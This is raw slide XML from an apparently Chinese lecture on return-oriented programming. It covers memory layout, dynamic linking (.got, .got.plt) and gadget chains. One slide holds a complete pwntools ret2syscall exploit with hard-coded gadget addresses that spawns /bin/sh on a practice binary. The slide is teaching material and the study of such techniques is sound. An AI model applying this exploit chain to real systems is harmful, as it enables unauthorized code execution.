                <a:srgbClr val="666666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dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr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7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="396313"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="2093056"/>
                <a:ext cx="1363200" cy="325549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zh-CN" dirty="0" err="1"/>
                  <a:t>Libc</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2418605"/>
                <a:ext cx="1363200" cy="475492"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1605876"/>
              <a:ext cx="5738969" cy="490143"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10888324" y="1295909"/>
            <a:ext cx="858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Stack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9" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6649322" y="1538342"/>
            <a:ext cx="5" cy="4450368"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649325" y="4517002"/>
            <a:ext cx="3883021" cy="28005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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649321" y="5415762"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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7" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649320" y="5678933"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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8" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649321" y="5920495"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10532341" y="5483977"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6174715" y="5483977"/>
            <a:ext cx="474606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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6174706" y="5483977"/>
            <a:ext cx="9" cy="262161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箭头连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6174706" y="5746138"/>
            <a:ext cx="474614" cy="1010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文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10888324" y="5536852"/>
            <a:ext cx="858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Text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2" name="连接符: 肘形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{477981EA-3FE8-461E-A6E5-DCAFADB62AAE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8081575" y="3292548"/>
            <a:ext cx="4949875" cy="11"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 76"/>
              <a:gd name="adj2" fmla="val 2147483646"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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矩形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDFD6823-6E38-485F-9740-4B2AEF44C443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall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98FF71FF-DDBE-C58B-F98C-5BD7FC2A14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685" y="858654"/>
            <a:ext cx="4427604" cy="1745131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25E5DCB4-EB85-47E8-6146-9838ED5A3E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685" y="3716007"/>
            <a:ext cx="5898391" cy="205758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050F204C-C7F4-26C3-76AD-9C03009C955B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373685" y="3036894"/>
            <a:ext cx="3904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有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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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sh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，但没有系统调用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EE660308-5075-F75A-6814-5DBFAF8B6581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373685" y="4287695"/>
            <a:ext cx="503320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寻找满足条件的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gadget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：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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 err="1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pop_eax_ret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 err="1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pop_edx_ecx_ebx_ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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int_80h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err="1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ROPgadget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--binary ret2syscall --only "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pop|ret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102589419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文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1FFE461-B8E4-4C17-A1A3-67FF7C4A0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1528206" y="1725232"/>
            <a:ext cx="570569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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pwn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import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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io = process("./ret2syscall")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" dirty="0" err="1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pop_eax_ret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= 0x080bb196</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pop_edx_ecx_ebx_ret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= 0x0806eb90</a:t>
            </a:r>
          </a:p>
          <a:p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int_80h = 0x08049421</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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bin_sh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= 0x80BE408</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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payload = flat([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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b'A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'*112, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pop_eax_ret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, 0xb, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pop_edx_ecx_ebx_ret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, 0, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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bin_sh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, int_80h])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" dirty="0" err="1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io.sendline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(payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" dirty="0" err="1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io.interactive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()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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DDFD6823-6E38-485F-9740-4B2AEF44C443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2086223" y="426889"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a: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AD16AA9F-3DA1-692E-E36E-F170F48F18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2581" y="1234036"/>
            <a:ext cx="3574090" cy="4633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99404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F8B9137-02AB-4718-89EF-4573CC640443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439229" y="1686143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动态链接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109FE739-503F-4113-95FC-6C3E8B44FBCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458033" y="1686144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静态链接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605FF71-7FA8-4A4D-A909-C396BBB6D83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602187" y="2479254"/>
            <a:ext cx="5089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程序装载进入内存时加载库代码解析外部引用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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C6DAE71-9F57-4E68-B9B5-87B74DC70785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6390159" y="2479254"/>
            <a:ext cx="55515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20212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链接器在编译链接时将库代码加入到可执行程序中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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169C472C-1EB6-4548-9412-70BC54B5610C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2965825" y="4290970"/>
            <a:ext cx="66607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编译   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  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汇编   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  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链接   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  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装载   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  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执行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A54F0E62-E3B9-4D58-B0A4-2793167A522B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439229" y="4752635"/>
            <a:ext cx="66624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代码 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 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汇编代码 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 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目标文件 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 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可执行文件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  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进程映像</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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1AEFF90A-F9BB-4633-BB34-63831C427E1D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3147115" y="2848586"/>
            <a:ext cx="4580209" cy="14423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7ACA1BA0-9CA8-4453-A8A5-5A6C8AE8D784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6296224" y="2848586"/>
            <a:ext cx="2869695" cy="14423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矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46D01AF8-E213-4DCE-B9C5-8B2A6B3EA662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 817"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1487488"/>
            <a:ext cx="2717800" cy="636587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动态链接相关结构</a:t>
            </a:r>
            <a:endParaRPr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18" name="Shape 818"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="3175200"/>
            <a:ext cx="1652000" cy="4096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.dynamic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819" name="Shape 819"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="3584800"/>
            <a:ext cx="1652000" cy="4096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.got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820" name="Shape 820"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="3994400"/>
            <a:ext cx="1652000" cy="4096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.got.plt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821" name="Shape 821"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="4404000"/>
            <a:ext cx="1652000" cy="4096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.data</a:t>
            </a:r>
            <a:endParaRPr sz="1867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822" name="Shape 822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="2872467"/>
            <a:ext cx="2542800" cy="409600"/>
          </a:xfrm>
          <a:prstGeom prst="rect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addr of .dynamic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823" name="Shape 823"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="3282067"/>
            <a:ext cx="2542800" cy="409600"/>
          </a:xfrm>
          <a:prstGeom prst="rect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link_map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824" name="Shape 824"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="3691667"/>
            <a:ext cx="2542800" cy="409600"/>
          </a:xfrm>
          <a:prstGeom prst="rect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dl_runtime_resolve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825" name="Shape 825"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="4101267"/>
            <a:ext cx="2542800" cy="4096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printf@plt + 6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826" name="Shape 826"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="4510867"/>
            <a:ext cx="2542800" cy="4096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puts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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="827" name="Shape 827"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="822" idx="1"/>
            <a:endCxn id="818" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2496600" y="3077267"/>
            <a:ext cx="1099600" cy="3028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28" name="Shape 828"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3196333" y="3069500"/>
            <a:ext cx="345600" cy="1673200"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 66935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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="829" name="Shape 829"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="820" idx="3"/>
            <a:endCxn id="828" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2496700" y="4189600"/>
            <a:ext cx="699600" cy="96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30" name="Shape 830"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023133" y="2723833"/>
            <a:ext cx="1327200" cy="3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b="1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sections</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1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831" name="Shape 831"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4204000" y="2474669"/>
            <a:ext cx="1327200" cy="3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b="1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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1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832" name="Shape 832"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7238500" y="2626069"/>
            <a:ext cx="4355200" cy="3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585" indent="-423323" defTabSz="1219170"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.dynamic section</a:t>
            </a:r>
